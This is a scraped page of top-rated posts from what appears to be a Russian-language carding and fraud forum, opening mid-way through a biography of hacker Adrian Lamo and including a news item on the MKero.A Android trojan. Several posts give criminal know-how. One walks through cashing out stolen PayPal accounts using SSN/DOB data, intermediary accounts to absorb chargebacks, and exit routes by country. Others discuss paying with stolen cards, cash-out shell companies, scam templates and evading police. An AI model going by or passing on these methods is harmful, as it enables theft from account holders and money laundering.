этим я хочу сказать, что по степени бардака угнаться за сетями провайдеров не может никто. Уж поверьте мне на слово, такие как я — могут годами сидеть в подобных сетях за контрольными панелями их серверов, и никто из местных админов даже не почешется.» У финишной черты Какие бы оценки не давали гению Эдриана, он, безусловно, один из самых ярких, известных и молодых хакеров Америки, обладающий своим собственным стилем, и даже — философией жизни. Отмотав свой срок, Эдриан призывает всех своих последователей: не нужно нарушать закон, есть много других способов для творчества, говорит он, куда можно приложить все свои способности и креативность, добившись ещё большего, чем это возможно в области криминального ремесла. Сейчас Эдриан завязал со своим прошлым. Ныне он известный журналист, получающий престижные награды в области сетевой журналистики, лектор, колесящий по компьютерным конференциям Америки, а также консультант одной из самых известных в мире компаний в области безопасности — @Stake. Эдриан остепенился, и даже женился на девушке Лауре (учитывая, что Эдриан везде заявляет себя как убежденного бисексуала и сторонника свободных отношений, остаётся только удивляться его непредсказуемости и склонности к невероятным экспериментам со своей жизнью, которыми я думаю, он нас всех ещё не раз удивит). Но, не смотря ни на что пережитое, в одном он всё же остаётся верен себе: «Есть вещи, которые меня можно заставить делать, только приставив дуло пистолета к моему виску. Я никогда не буду работать полный рабочий день, просиживая всю свою жизнь на цепи, как верный своему хозяину пес, в каком-нибудь офисе, даже если Microsoft или Cisco устелют пол моего офиса стодолларовыми купюрами. В свои 28 лет я точно понял, это — не для меня». И, напоследок, лучше один раз увидеть, чем сто раз услышать: вся жизнь в фотографиях. Эндриан за своим знаменитым ноутбуком, который отслужил ему верой и правдой 7 лет, за которым столько всего было сделано… который он купил с рук за 150 баксов в 2002 году, и на нем до сих пор нет клавиш с буквами P и Z. Три самых знаменитых хакера Америки, слево направо: Эндриан Ламо, Кевин Митник, Кевин Полсен. Все трое в своё время были арестованы ФБР по одной и той же статье — совокупный срок этой троицы: 9 лет. Ламо в прямом эфире CBS демонстрирует афишу ФБР WANTED, когда на него объявили охоту сразу три спецслужбы США. Прикинь: этот рисковый парень умудрялся участвовать в прямых эфирах даже тогда, когда он был в федеральном розыске! На самом деле — американское телевидение просто обожает Ламо, он частый гость прямых эфиров hi-tech новостей таких федеральных телеканалов, как CNN, CBS, NBC, Fox News, и многих других. Многое изменилось с тех пор… Теперь Ламо внештатный консультант одной из самых престижных и дорогих компаний по сетевой безопасности в мире — @Stake, которая базируется в Кэмбридже, и которую основали выходцы из суперзнаменитой хакерской группы L0pht. Выражение «at stake» имеет не только словарное значение «под угрозой», но это также жаргонное выражение используемое в казино, смысл которого «ставить всё на кон». Впрочем, теперь эта компания уже совсем не та, которой была в те золотые её годы — @Stake был агрессивно поглощен компанией Symantec в 2004 году, после чего эту выдающуюся контору покинули её самые известные и тенденциозные хакеры. Кстати говоря, именно так достался Symantec знаменитый аудит-пакет L0phtCrack. Технологические гении оказались совершенно беззащитными в мире большого бизнеса, впрочем, как это всё произошло (а это та ещё история!) — это уже совсем другая история, к которой мы ещё обязательно вернемся на страницах нашего блога. Ох и тяжело же ходить Эндриану каждый день на работу в офис. Поэтому он туда и не ходит! Эдриан всегда на острие — острая критика на конференции по безопасности скандально известного проекта WikiLeaks. ZDNetназвала Эндриана даже национальным героем, за его принципиальную гражданскую позицию, за то, что теперь… он сам стучит американским властям на инакомыслящих. Удивительная жизнь, удивительная биография, удивительные события… что не факт — всё ссылка в Wikipedia. Сам Эдриан уверен, что талантами не рождаются, — ими становятся. Жизнь как супермаркет: главное, если выбирать что-то — то до конца и навсегда!
  20. 1 балл
    Брал ИП под обнал Проходит все нормально , более писать не буду, ибо палево
  21. 1 балл
    Спасибо за помощь в моем деле! Очень грамотный сервис , продолжайте в том же духе . Очень быстро и выгодно решили мою проблему Спасибо за проведенную работу!
  22. 1 балл
    согласен, все бесплатные впн мусарские, и такие как пробные на неск дней) Будьте аккуратнее с такими, лучше заплатите копеечку за свою безопасность)
  23. 1 балл
    Специалисты компании BitDefender сообщили об обнаружении в официальном магазине приложений Google Play программ, содержащих троян Android.Trojan.MKero.A. Эта малварь известна экспертам еще с 2014 года и способна обходить систему CAPTCHA. В прошлом году, по данным BitDefender, троян MKero.A поразил в основном страны Восточной Европы, в числе которых была и Россия. Тогда троян распространялся в социальных сетях и через сторонние, неофициальные магазины приложений. Сейчас все иначе. Авторы вредоноса нашли способ обойти систему Google Bouncer, использующуюся для проверки приложений, так что теперь троян содержится в легальных приложениях Google Play. Отличительная особенность MKero.A – умение проходить систему CAPTCHA. Дело в том, что вредонос никак не проявляет себя на зараженном устройстве, зато подписывает своих жертв на различные платные сервисы. Эти сервисы, в ходе оформления подписки, в свою очередь, просят ввести символы с картинки. Для решения данной задачи, MKero.A перенаправляет запрос CAPTCHA на Antigate.com. Данный сервис предлагает свои услуги по ручному распознаванию текста с изображений. Стоимость данной услуги авторы сервиса оценивают в 0.7USD за 1000 изображений, в зависимости от объема. То есть около 2 копеек за каждую картинку. Оказалось, такая тактика прекрасно работает. На данный момент у приложений, зараженных трояном, насчитывается от 100 до 500 тысяч установок. По приблизительным подсчетам экспертов, финансовые потери жертв хакеров составляют $250 000, если каждую жертву подписали, как минимум, на один премиум-сервис.
  24. 1 балл
  25. 1 балл
    Привет сегодня поговорим как слить палку без локов и прочего гемора теория относительно проста берём банк акк+ssn&dob если это юса регаем вяжем банк акк пополняем баланс идём в любой sell сервис например sellfly.com где норм выводят или просто мерч палки чтоб инстант пропалата падала на счёт до этого нам необходимо сделать саморег с балансом или же залить с сс саморег-прокладку и саморег-выводной акк в чём суть? дело в том что прогнав сумму через прокладку и если вдруг прийдёт чардж наша прокладка уйдёт в минус а наш финишный выводной акк останется неприкасаем незнаю как работает эта фича почему так но она работает куда слить такую палку? обменники на битки впервый раз конечно вывести инстант неполучится холд 3-4 дня зато следующие разы холда не будет заявка дождётся обработки и будет успешно завершена пополнение мобилок паблик мерчи тоже самое впервый раз будет холд следующие разы инстант лимиты после каждый сделки практически во всех конторах растут банк карты крепим карту к палке верифаем и потихоньку выводим во всех странах по разному выводится юса 2-5 дней нужен банк акк польша за двое суток баланс падал на карту латвия 24 италия 24-48 зависит от банка совет:делайте самореги прокладки выводные одной страны желательно так лучше заходит и лимиты реже встречаешь думаю вам будет полезно
  26. 1 балл
    Друг,ответь в личке,схему оплатил!
  27. 1 балл
    Лови cupidmedia.com и suggardaddyforme.com до сих пор набираю там,проплачивай обычной СС :ugeek:
  28. 1 балл
    Доброй ночи форумчане! ) Хотел бы узнать какой программой можно чекать акки от контакта?) Заранее благодарен!
  29. 1 балл
    Подскажите где купить хорошие шаблоны под scam.Нужно срочно.Шаблоны 2000 х не предлогать,нужны свежие
  30. 1 балл
    найдешь,в инете много куда можно продать,просто гуглом надо уметь пользоваться
  31. 1 балл
    Тема реально крутая) А где брать логин и пасс для банковского акка?
  32. 1 балл
    кто ни будь сможет меня научить пользоватся палкой, и все подробно расскащать?
  33. 1 балл
  34. 1 балл
    отследить могут легко, и ничего не поможет, на счет суммы 1500р за такую сумму отдел "К" Мвд не занимается, там задачи более высокого уровня, типа подрыв экономической безопасности отдельных секторо экономики, но ни как не тебя искать, тебя может только найти твоя совесть.
  35. 1 балл
    пиши в личку объясню как обезопасить себя на 100%
  36. 1 балл
    а сколько таких случаев, когда грамотная команда, просто "кидала" своего босса. Тут однозначного рецепта нет - так или иначе нужно поступать. Но нужно помнить что в бизнесе - доверять можно только себе.
  37. 1 балл
    Мне только непонятно, почему они проводят эти семинары бесплатно? В чем их интерес? Ведь они учат людей зарабатывать А в бескорыстность я не верю уже очень давно
  38. 1 балл
    Тема насчет чистоты юр адреса и прочих реквизитов, весьма актуальна. На этом деле кидают по черному!
  39. 1 балл
    делал всегда с capone signature 200-1000 $ не проблема, при оплате указуем email холдера , ip штата , нужна только 100% о холдере так как после идет проверка саппортом в течение 10-30 минут
  40. 1 балл
    и тут ты полностью прав.. уважаемый)) тем более - с освоением чипа и его эмуляции (а уже есть идеи).. подбор пина к картам.. когда его не получилось добыть сразу - намного упрощается.. этак до минут 10.. локальной работы компа.. без лазанья по инет-банкингам и прочим фраудным экстримным развлечениям))
  41. 1 балл
    есть такая штука называеться honeypot дак вот когда ты берешь хуй пойми у кого сокс,ставишь свою тачку,и все что ты делаешь буквально все,о тебе узнают легавые на котором стоит сервер где стоит IP (socks) который ты взял,там стоит специальный софт который ведет полное логирование,так что мое имхо это купить абузный сервак и ставить свой vpn тогда и всякой херни не будет
  42. 1 балл
  43. 1 балл
    СНГ это от Казахстана до Белоруссии
  44. 1 балл
    Опиши больше подробностей: при каких обстоятельствах, свидетели есть? Дело уже завели или только хотят? Если еще не завели, то пусть скорее ищет сумму, долги, кредит...без разницы. Пока машина не завертелась.
  45. 1 балл
    думаешь час ведутся на такие темы ?
  46. 1 балл
    им не только разрешено), они обязаны выписать штрафы! а у нас в рашке че, ксивы показал и дальше поехал
  47. 1 балл
    привет!меня зовут девочка duffy!мне 15 лет!и я никогда не употребляла наркотики,и никогда не пробывала!и вам того же желаю,всего вам хорошего!я не знаю,зачем я это пишу,меня попросил мой мальчик! вот. - Это что за кислота ??? :mrgreen: :mrgreen:
  48. 1 балл
    В фильме Zeitgeist он же Дух Времени оч много интересных фактов о террористическом акте в США, только насколько я помню он 11 сентября был. Да даже в том же YouTube очень много интересных видео, которых по телеку не покажут никогда
  49. 1 балл
    я знаю...пытаемся использовать все шансы
  50. 1 балл
    В Санкт-Петербурге сотрудники правоохранительных органов задержали троих подозреваемых в краже дорогостоящих шуб из мехового салона на Невском проспекте, совершенной в ноябре этого года. Как сообщили РБК в милиции, двое злоумышленников арестованы, один находится под подпиской о невыезде. Задержанные полностью изобличены в совершении преступления, отмечают стражи порядка. Как сообщалось ранее, кража была совершена в магазине "Меха и шляпы" на Невском проспекте Петербурга 10 ноября 2010 года рано утром, около пяти часов. Из салона вынесли 42 норковых шубы на общую сумму порядка 5 миллионов рублей. Предыдущая столь крупая кража меховых изделий произошла в Петербурге год назад, 2 ноября 2009 года. Тогда неизвестные похитили из магазина "Меха-кожа" на бульваре Новаторов 40 шуб и 4 куртки. Общая сумма ущерба составила порядка 3 миллионов рублей.
×
×
  • Создать...